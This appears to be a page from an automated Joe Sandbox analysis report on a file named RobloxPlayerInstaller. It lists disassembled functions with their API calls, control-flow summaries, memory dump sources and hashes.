                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000146C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001472000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000014D6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000014D8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000152B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000157C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000015CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000161F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001670000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000016C1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001712000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001763000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000017B4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001805000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001856000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000018A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000018F9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000194A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000199B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001EFE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001F3E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001F41000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1512774662.0000000001F43000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_df0000_RobloxPlayerInstaller.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AllocateHeap
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1279760036-0
                                                                                                                  • Opcode ID: 228a18c27c91c7efde0ad69487646103aeb6c465d8643530d62df5d6e5a2369a
                                                                                                                  • Instruction ID: 6d304be1784edbc668c9938d9da15374a90138645dee53dfeef0fd22fa0d0bcc
                                                                                                                  • Opcode Fuzzy Hash: 228a18c27c91c7efde0ad69487646103aeb6c465d8643530d62df5d6e5a2369a
                                                                                                                  • Instruction Fuzzy Hash: A5F05979E0C1256BAB3F2B6A9D01B5B7B489F513B0B058022AD14D61C4EBB0D80087E9
                                                                                                                  Function 0110A4EA Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 176 110a4ea-110a4f6 177 110a528-110a533 call 10ee672 176->177 178 110a4f8-110a4fa 176->178 186 110a535-110a537 177->186 180 110a513-110a524 RtlAllocateHeap 178->180 181 110a4fc-110a4fd 178->181 182 110a526 180->182 183 110a4ff-110a506 call 1109cb0 180->183 181->180 182->186 183->177 188 110a508-110a511 call 11125ed 183->188 188->177 188->180
                                                                                                                  APIs
                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,010F463C,0110A27F,?,01103C3D,0121C588,00000018,00000003), ref: 0110A51C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.1510946174.0000000000DF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.1510920727.0000000000DF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511233816.0000000001138000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511333085.0000000001220000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511358587.0000000001224000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511411663.00000000012D0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511445112.00000000012D8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000012E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000012E7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001301000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001389000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001466000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000146C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001472000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000014D6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000014D8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000152B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000157C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000015CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000161F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001670000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000016C1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001712000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001763000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000017B4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001805000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001856000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000018A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000018F9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000194A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000199B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001EFE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001F3E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001F41000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1512774662.0000000001F43000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_df0000_RobloxPlayerInstaller.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AllocateHeap
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1279760036-0
                                                                                                                  • Opcode ID: 95321715bab98a2f7176ea9257cb6f7c65004f6b86f5628a05c723bbe59ca8ca
                                                                                                                  • Instruction ID: aa820afcc5dd140b48b25e3aa794406bf1d58be1f9926886a0626ac884ae521d
                                                                                                                  • Opcode Fuzzy Hash: 95321715bab98a2f7176ea9257cb6f7c65004f6b86f5628a05c723bbe59ca8ca
                                                                                                                  • Instruction Fuzzy Hash: E7E0E5319013265BEA3F26A9BC04B5A7A8CBF522B0F050120BE54970C4DBE1D90086A2
                                                                                                                  Function 01107A3B Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 191 1107a3b-1107a69 call 10e3198 call 1107793 195 1107a6e-1107a73 call 10e3175 191->195
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.1510946174.0000000000DF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.1510920727.0000000000DF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511233816.0000000001138000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511333085.0000000001220000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511358587.0000000001224000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511411663.00000000012D0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511445112.00000000012D8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000012E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000012E7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001301000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001389000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001466000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000146C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001472000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000014D6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000014D8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000152B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000157C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000015CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000161F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001670000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000016C1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001712000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001763000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000017B4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001805000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001856000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000018A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000018F9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000194A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000199B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001EFE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001F3E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001F41000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1512774662.0000000001F43000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_df0000_RobloxPlayerInstaller.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: H_prolog3
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 431132790-0
                                                                                                                  • Opcode ID: 923be91dfbc51954f1659e1c6357f82d0ad671e6caa8136efaa2e1dc2215a405
                                                                                                                  • Instruction ID: 05b55ec48010010c04ddc8157fad51626dabbdc6299a35a4c46025c2240f0849
                                                                                                                  • Opcode Fuzzy Hash: 923be91dfbc51954f1659e1c6357f82d0ad671e6caa8136efaa2e1dc2215a405
                                                                                                                  • Instruction Fuzzy Hash: EFE07576C0120EAEDB01DBD4C555BEEBBB8AB18300F5044669245E7180EB7497458BA1

                                                                                                                  Non-executed Functions

                                                                                                                  Function 0110D13C Relevance: .0, Instructions: 22COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.1510946174.0000000000DF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.1510920727.0000000000DF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511233816.0000000001138000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511333085.0000000001220000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511358587.0000000001224000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511411663.00000000012D0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511445112.00000000012D8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000012E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000012E7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001301000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001389000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001466000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000146C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001472000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000014D6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000014D8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000152B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000157C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000015CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000161F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001670000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000016C1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001712000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001763000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000017B4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001805000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001856000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000018A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000018F9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000194A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000199B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001EFE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001F3E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001F41000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1512774662.0000000001F43000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_df0000_RobloxPlayerInstaller.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 52a31a1b2c87d20f6f1ccd6e3f5e56cdbfee1b29986efbea090f4dac1cf3a30c
                                                                                                                  • Instruction ID: e8f4b7664334dd699ff31735bc7158397080108aca632e416f18e9ec654d9ab5
                                                                                                                  • Opcode Fuzzy Hash: 52a31a1b2c87d20f6f1ccd6e3f5e56cdbfee1b29986efbea090f4dac1cf3a30c
                                                                                                                  • Instruction Fuzzy Hash: 4EE08C32D11238EBCB2ADBDCD90498AF7ECEB48E44B110096B601D3180C7B0DE00CBD0
                                                                                                                  Function 011043AC Relevance: .0, Instructions: 12COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.1510946174.0000000000DF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.1510920727.0000000000DF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511233816.0000000001138000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511333085.0000000001220000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511358587.0000000001224000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511411663.00000000012D0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511445112.00000000012D8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000012E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000012E7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001301000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001389000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001466000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000146C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001472000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000014D6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000014D8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000152B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000157C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000015CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000161F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001670000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000016C1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001712000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001763000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000017B4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001805000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001856000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000018A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000018F9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000194A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000199B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001EFE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001F3E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001F41000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1512774662.0000000001F43000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_df0000_RobloxPlayerInstaller.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 825b0484f95f8aa3fa9de2913042429f620acb6fc0ba1aea453df1d5c0501ff0
                                                                                                                  • Instruction ID: cff7a1d4d1d10c8fd03c4808030218cbe76457b3784718e91e0e9010707d0933
                                                                                                                  • Opcode Fuzzy Hash: 825b0484f95f8aa3fa9de2913042429f620acb6fc0ba1aea453df1d5c0501ff0
                                                                                                                  • Instruction Fuzzy Hash: 23C08034405D1446CD1F451491F13687355A391681F40398CC6030FAC1CB5D6843D700
                                                                                                                  Function 010E6350 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 132COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 010E6387
                                                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 010E638F
                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 010E6418
                                                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 010E6443
                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 010E6498
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.1510946174.0000000000DF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.1510920727.0000000000DF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511233816.0000000001138000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511333085.0000000001220000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511358587.0000000001224000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511411663.00000000012D0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511445112.00000000012D8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000012E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000012E7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001301000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001389000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001466000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000146C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001472000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000014D6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000014D8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000152B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000157C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000015CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000161F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001670000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000016C1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001712000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001763000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000017B4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001805000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001856000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000018A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000018F9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000194A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000199B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001EFE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001F3E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001F41000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1512774662.0000000001F43000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_df0000_RobloxPlayerInstaller.jbxd
